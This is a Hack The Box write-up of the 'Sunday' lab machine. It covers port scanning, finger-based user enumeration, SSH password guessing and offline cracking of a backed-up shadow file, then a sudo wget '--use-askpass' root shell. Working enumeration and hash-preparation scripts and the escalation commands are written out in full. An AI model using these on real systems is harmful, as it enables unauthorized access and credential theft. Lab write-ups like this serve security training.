- Published on
HTB Sunday
- Authors
- Name
- collinhacks
- @collinhacks
Sunday
Enumeration
nmap
all ports, full enumerate
nmap -p- -sV -A <ip> --open -o full-enumerate.nmap
┌──(collinhacks㉿CH)-[~/Lab/HTB/Sunday]
└─$ nmap -p- -sV -A $IP --open -o full-enumerate.nmap
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-20 21:01 EDT
Nmap scan report for 10.129.162.17
Host is up (0.041s latency).
Not shown: 61978 filtered tcp ports (no-response), 3552 closed tcp ports (conn-refused)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
79/tcp open finger?
|_finger: No one logged on\x0D
| fingerprint-strings:
| GenericLines:
| No one logged on
| GetRequest:
| Login Name TTY Idle When Where
| HTTP/1.0 ???
| HTTPOptions:
| Login Name TTY Idle When Where
| HTTP/1.0 ???
| OPTIONS ???
| Help:
| Login Name TTY Idle When Where
| HELP ???
| RTSPRequest:
| Login Name TTY Idle When Where
| OPTIONS ???
| RTSP/1.0 ???
| SSLSessionReq, TerminalServerCookie:
|_ Login Name TTY Idle When Where
111/tcp open rpcbind 2-4 (RPC #100000)
515/tcp open printer
6787/tcp open ssl/http Apache httpd 2.4.33 ((Unix) OpenSSL/1.0.2o mod_wsgi/4.5.1 Python/2.7.14)
|_http-server-header: Apache/2.4.33 (Unix) OpenSSL/1.0.2o mod_wsgi/4.5.1 Python/2.7.14
| tls-alpn:
|_ http/1.1
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=sunday
| Subject Alternative Name: DNS:sunday
| Not valid before: 2021-12-08T19:40:00
|_Not valid after: 2031-12-06T19:40:00
| http-title: Solaris Dashboard
|_Requested resource was https://10.129.162.17:6787/solaris/
22022/tcp open ssh OpenSSH 7.5 (protocol 2.0)
| ssh-hostkey:
| 2048 aa:00:94:32:18:60:a4:93:3b:87:a4:b6:f8:02:68:0e (RSA)
|_ 256 da:2a:6c:fa:6b:b1:ea:16:1d:a6:54:a1:0b:2b:ee:48 (ED25519)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 194.89 seconds
nmap
(all identified TCP ports + default scripts & service versions)
nmap -p <1,2,3> -sV --script default --script http-methods --script http-headers <ip> -o <ip>-identified-ports.nmap
└─$ nmap -p 79,111,515,6787,22022 -sV --script default --script http-methods --script http-headers 10.129.162.17 -o identified-ports.nmap
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-20 21:08 EDT
Nmap scan report for 10.129.162.17
Host is up (0.058s latency).
PORT STATE SERVICE VERSION
79/tcp open finger?
|_finger: No one logged on\x0D
| fingerprint-strings:
| GenericLines:
| No one logged on
| GetRequest:
| Login Name TTY Idle When Where
| HTTP/1.0 ???
| HTTPOptions:
| Login Name TTY Idle When Where
| HTTP/1.0 ???
| OPTIONS ???
| Help:
| Login Name TTY Idle When Where
| HELP ???
| RTSPRequest:
| Login Name TTY Idle When Where
| OPTIONS ???
| RTSP/1.0 ???
| SSLSessionReq, TerminalServerCookie:
|_ Login Name TTY Idle When Where
111/tcp open rpcbind 2-4 (RPC #100000)
515/tcp open printer
6787/tcp open ssl/http Apache httpd 2.4.33 ((Unix) OpenSSL/1.0.2o mod_wsgi/4.5.1 Python/2.7.14)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=sunday
| Subject Alternative Name: DNS:sunday
| Not valid before: 2021-12-08T19:40:00
|_Not valid after: 2031-12-06T19:40:00
| tls-alpn:
|_ http/1.1
|_http-server-header: Apache/2.4.33 (Unix) OpenSSL/1.0.2o mod_wsgi/4.5.1 Python/2.7.14
| http-headers:
| Date: Fri, 21 Jul 2023 01:10:03 GMT
| Server: Apache/2.4.33 (Unix) OpenSSL/1.0.2o mod_wsgi/4.5.1 Python/2.7.14
| X-Frame-Options: SAMEORIGIN
| Last-Modified: Fri, 17 Aug 2018 02:07:09 GMT
| ETag: "f46-57398045d4d40"
| Accept-Ranges: bytes
| Content-Length: 3910
| Cache-Control: max-age=7200
| Expires: Fri, 21 Jul 2023 03:10:03 GMT
| Vary: Accept-Encoding
| Strict-Transport-Security: max-age=15768000
| Connection: close
| Content-Type: text/html
|
|_ (Request type: HEAD)
| http-title: Solaris Dashboard
|_Requested resource was https://10.129.162.17:6787/solaris/
22022/tcp open ssh OpenSSH 7.5 (protocol 2.0)
| ssh-hostkey:
| 2048 aa:00:94:32:18:60:a4:93:3b:87:a4:b6:f8:02:68:0e (RSA)
|_ 256 da:2a:6c:fa:6b:b1:ea:16:1d:a6:54:a1:0b:2b:ee:48 (ED25519)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 103.37 seconds
nmap
(vuln scan)
nmap -p <1,2,3> --script vuln <ip> -o <ip>-vuln.nmap
Port Enumeration
Port 79
finger
finger admin@$IP
finger user@$IP
More enumeration for finger: https://pentestmonkey.net/tools/user-enumeration/finger-user-enum
./finger-user-enum.pl -U /usr/share/seclists/Usernames/Names/names.txt -t 10.129.162.17 | less -S
This turns up two odd entries, sunny and sammy, both with an ssh TTY and a last-login date from 10.10.14.13, so we can assume they are real, active accounts. For comparison, system accounts like bin and sys exist but show "< . . . . >" (never logged in), and names the box does not know come back as just "name ???".
----------------------------------------------------------
| Scan Information |
----------------------------------------------------------
Worker Processes ......... 5
Usernames file ........... /usr/share/seclists/Usernames/Names/names.txt
Target count ............. 1
Username count ........... 10177
Target TCP port .......... 79
Query timeout ............ 5 secs
Relay Server ............. Not used
######## Scan started at Thu Jul 20 22:17:16 2023 #########
access@10.129.162.17: access No Access User < . . . . >..nobody4 SunOS 4.x NFS Anonym < . . . . >..
admin@10.129.162.17: Login Name TTY Idle When Where..adm Admin < . . . . >..dladm Datalink Admin < . . . . >..netadm Network Admin >
anne marie@10.129.162.17: Login Name TTY Idle When Where..anne ???..marie ???..
bin@10.129.162.17: bin ??? < . . . . >..
dee dee@10.129.162.17: Login Name TTY Idle When Where..dee ???..dee ???..
ike@10.129.162.17: ikeuser IKE Admin < . . . . >..
jo ann@10.129.162.17: Login Name TTY Idle When Where..ann ???..jo ???..
la verne@10.129.162.17: Login Name TTY Idle When Where..la ???..verne ???..
line@10.129.162.17: Login Name TTY Idle When Where..lp Line Printer Admin < . . . . >..
message@10.129.162.17: Login Name TTY Idle When Where..smmsp SendMail Message Sub < . . . . >..
miof mela@10.129.162.17: Login Name TTY Idle When Where..mela ???..miof ???..
root@10.129.162.17: root Super-User console <Apr 13, 2022>..
sammy@10.129.162.17: sammy ??? ssh <Apr 13, 2022> 10.10.14.13 ..
sunny@10.129.162.17: sunny ??? ssh <Apr 13, 2022> 10.10.14.13 ..
sys@10.129.162.17: sys ??? < . . . . >..
zsa zsa@10.129.162.17: Login Name TTY Idle When Where..zsa ???..zsa ???..
######## Scan completed at Thu Jul 20 22:20:36 2023 #########
16 results.
10177 queries in 200 seconds (50.9 queries / sec)
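The same three-way classification (logged in / exists but never logged in / unknown), as a small finger client and reply parser. This is an added example, not code from the original writeup and not finger-user-enum.pl; the only assumption is the Solaris reply layout seen above (a "Login Name TTY Idle When Where" header, then one row per name queried), and the sample reply embedded below is constructed from those rows.

```python
"""Tiny finger (RFC 1288) client plus a parser for the Solaris-style reply.

Added example, not part of the original writeup and not finger-user-enum.pl.
The only assumption is the reply layout seen in the scan above: a header
line "Login Name TTY Idle When Where", then one row per name queried.
"""
import re
import socket
import sys

HEADER = re.compile(r"^Login\s+Name\s+TTY", re.I)
# "<Apr 13, 2022>" marks an account that has logged in; "< .  .  .  . >" marks
# one that exists but never has; a name the box doesn't know gets neither.
LAST_LOGIN = re.compile(r"<([A-Z][a-z]{2} +\d{1,2}, +\d{4})>")
NEVER_LOGGED_IN = re.compile(r"<\s*(?:\.\s*){4}>")


def finger_query(host, user, port=79, timeout=5.0):
    """Send one "{user}\\r\\n" query and return the raw reply as text (needs network)."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(f"{user}\r\n".encode())
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks).decode(errors="replace")


def parse_finger_reply(text):
    """Return one dict per row: login, status (active/exists/unknown), last, where."""
    rows = []
    for line in text.splitlines():
        line = line.rstrip()
        if not line or HEADER.match(line) or line.startswith("No one logged on"):
            continue
        login = line.split()[0]
        hit = LAST_LOGIN.search(line)
        if hit:
            status, last = "active", hit.group(1)
            where = line[hit.end():].strip()   # remote host, empty for console
        elif NEVER_LOGGED_IN.search(line):
            status, last, where = "exists", None, ""
        else:
            status, last, where = "unknown", None, ""
        rows.append({"login": login, "status": status, "last": last, "where": where})
    return rows


def enumerate_users(host, candidates, port=79):
    """Finger every candidate name and keep those the daemon recognises."""
    found = {}
    for name in candidates:
        for row in parse_finger_reply(finger_query(host, name, port)):
            if row["status"] != "unknown":
                found[row["login"]] = row
    return found


# Constructed sample reply, assembled from the rows shown in the scan above.
SAMPLE_REPLY = (
    "Login       Name               TTY         Idle    When    Where\r\n"
    "sunny           ???            ssh          <Apr 13, 2022> 10.10.14.13\r\n"
    "sammy           ???            ssh          <Apr 13, 2022> 10.10.14.13\r\n"
    "root     Super-User            console      <Apr 13, 2022>\r\n"
    "sys             ???                         < .  .  .  . >\r\n"
    "anne            ???\r\n"
)

if __name__ == "__main__":
    if len(sys.argv) < 3:   # offline demo: parse the constructed sample
        for row in parse_finger_reply(SAMPLE_REPLY):
            print(row)
    else:                   # python3 finger_enum.py <host> <wordlist>
        with open(sys.argv[2]) as fh:
            names = [n.strip() for n in fh if n.strip()]
        for login, row in enumerate_users(sys.argv[1], names).items():
            print(f"{login:12} {row['status']:8} {row['last'] or '':14} {row['where']}")
```

Run it with no arguments to see the parser classify the constructed sample; with a host and a names file it fingers each candidate one at a time. The "exists" bucket is the useful extra over grepping for ssh: those accounts have shells worth password-spraying even though nobody has used them yet.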
- Guessed the password: ssh -p 22022 sunny@<ip> with password sunday.
- hydra would've worked here too, against port 22022 with the sunny and sammy usernames from finger.
Exploitation
Step by step process:
Port 22022
sudo -l
sunny@sunday:~$ sudo -l
User sunny may run the following commands on sunday:
(root) NOPASSWD: /root/troll
fucker lol
Checked for anything out of the ordinary with
ls -la ~/; ls -la /home/*/ / /home/*/.bash_history
A /backup directory stands out: it holds a shadow.txt and a matching passwd.txt. Pulled both back and cracked the hashes (saved as passwords.txt) on the local machine; mode 7400 is sha256crypt ($5$):
hashcat -m 7400 passwords.txt /usr/share/wordlists/rockyou.txt --force
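The unshadow-and-pick-a-mode step above, as an added example (not code from the original writeup or from hashcat). It assumes only the standard colon-separated passwd(5)/shadow(5) layout of the two backup files; the sample records embedded below are constructed, with placeholder hashes, not the box's real ones. It goes a little beyond the single $5$ case by mapping the other crypt(3) prefixes to their hashcat modes and skipping locked or passwordless entries.

```python
"""Merge passwd/shadow copies into hashcat input and pick the right -m mode.

Added example, not part of the original writeup. It assumes only the
standard colon-separated passwd(5)/shadow(5) layout of the files found in
/backup; the sample records below are constructed, with placeholder hashes,
not the box's real ones.
"""
import sys

# hashcat modes for the crypt(3) prefixes a Solaris or Linux shadow file can hold
HASHCAT_MODES = {
    "$1$": 500,    # md5crypt
    "$5$": 7400,   # sha256crypt (the mode used against Sunday's shadow.txt)
    "$6$": 1800,   # sha512crypt
    "$2a$": 3200,  # bcrypt variants
    "$2b$": 3200,
    "$2y$": 3200,
}
# placeholders that mean "no crackable hash here"
NOT_A_HASH = {"", "x", "*", "!", "!!", "NP", "*NP*", "*LK*"}


def hashcat_mode(h):
    """Return the hashcat -m value for a crypt(3) hash string, or None if unsupported."""
    for prefix, mode in HASHCAT_MODES.items():
        if h.startswith(prefix):
            return mode
    return None


def parse_records(text):
    """Map login -> field list for every well-formed passwd/shadow line."""
    records = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) >= 2:
            records[fields[0]] = fields
    return records


def unshadow(passwd_text, shadow_text):
    """Join passwd and shadow on login; return only entries hashcat can work on."""
    passwd = parse_records(passwd_text)
    shadow = parse_records(shadow_text)
    entries = []
    for login, pw in passwd.items():
        sh = shadow.get(login)
        h = sh[1] if sh else pw[1]          # shadow wins; passwd normally holds "x"
        locked = h.startswith("*LK*")       # Solaris `passwd -l` prepends *LK* to the hash
        if locked:
            h = h[len("*LK*"):]
        if h in NOT_A_HASH or not h.startswith("$"):
            continue
        mode = hashcat_mode(h)
        if mode is None:
            continue                        # e.g. a yescrypt "$y$" hash: needs another tool
        entries.append({
            "login": login, "hash": h, "mode": mode, "locked": locked,
            "uid": pw[2] if len(pw) > 2 else None,
            "shell": pw[6] if len(pw) > 6 else None,
        })
    return entries


def hashfile_lines(entries, mode):
    """'login:hash' lines for one mode, for use with hashcat --username."""
    return [f"{e['login']}:{e['hash']}" for e in entries if e["mode"] == mode]


def hashcat_argv(mode, hashfile, wordlist):
    """The hashcat invocation for one mode; --username makes it skip the login prefix."""
    return ["hashcat", "-m", str(mode), "--username", hashfile, wordlist]


# Constructed sample records (placeholder hashes, not the real ones from the box).
SAMPLE_PASSWD = """\
root:x:0:0:Super-User:/root:/usr/bin/bash
sunny:x:65535:1::/export/home/sunny:/bin/bash
sammy:x:100:1::/export/home/sammy:/bin/bash
nobody:x:60001:60001:NFS Anonymous Access User:/:
"""
SAMPLE_SHADOW = """\
root:NP:6445::::::
sunny:$5$abcdefgh$%s:6445::::::
sammy:$5$ijklmnop$%s:6445::::::
nobody:*LK*:6445::::::
""" % ("0" * 43, "1" * 43)

if __name__ == "__main__":
    if len(sys.argv) == 3:   # python3 unshadow.py passwd.txt shadow.txt
        passwd_text, shadow_text = (open(p).read() for p in sys.argv[1:3])
    else:
        passwd_text, shadow_text = SAMPLE_PASSWD, SAMPLE_SHADOW
    entries = unshadow(passwd_text, shadow_text)
    for mode in sorted({e["mode"] for e in entries}):
        name = f"hashes-{mode}.txt"
        with open(name, "w") as fh:
            fh.write("\n".join(hashfile_lines(entries, mode)) + "\n")
        print(" ".join(hashcat_argv(mode, name, "/usr/share/wordlists/rockyou.txt")))
```

Keeping the login in front of each hash (and passing --username) means the cracked output tells you which account the password belongs to, which matters here because only sammy's sudo rights lead anywhere.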
su sammy with the cracked password cooldude!, then sudo -l to check sammy's permissions. We can see wget runs as root, which is an easy GTFOBins exploit: --use-askpass makes wget run the given program to obtain a password, so pointing it at a script that execs a shell (with stdout redirected back to the terminal via 1>&0) gives a root shell. Just copy-pasted it into the terminal for root:
sammy@sunday:~$
sammy@sunday:~$ TF=$(mktemp)
sammy@sunday:~$ chmod +x $TF
sammy@sunday:~$ echo -e '#!/bin/sh\n/bin/sh 1>&0' >$TF
sammy@sunday:~$ sudo wget --use-askpass=$TF 0
Useful resource links
- https://0xdf.gitlab.io/2018/09/29/htb-sunday.html (6 methods for wget privilege escalation)
Lessons Learned
- wget priv esc via sudo
- sudo -l is user specific: re-run it after every lateral move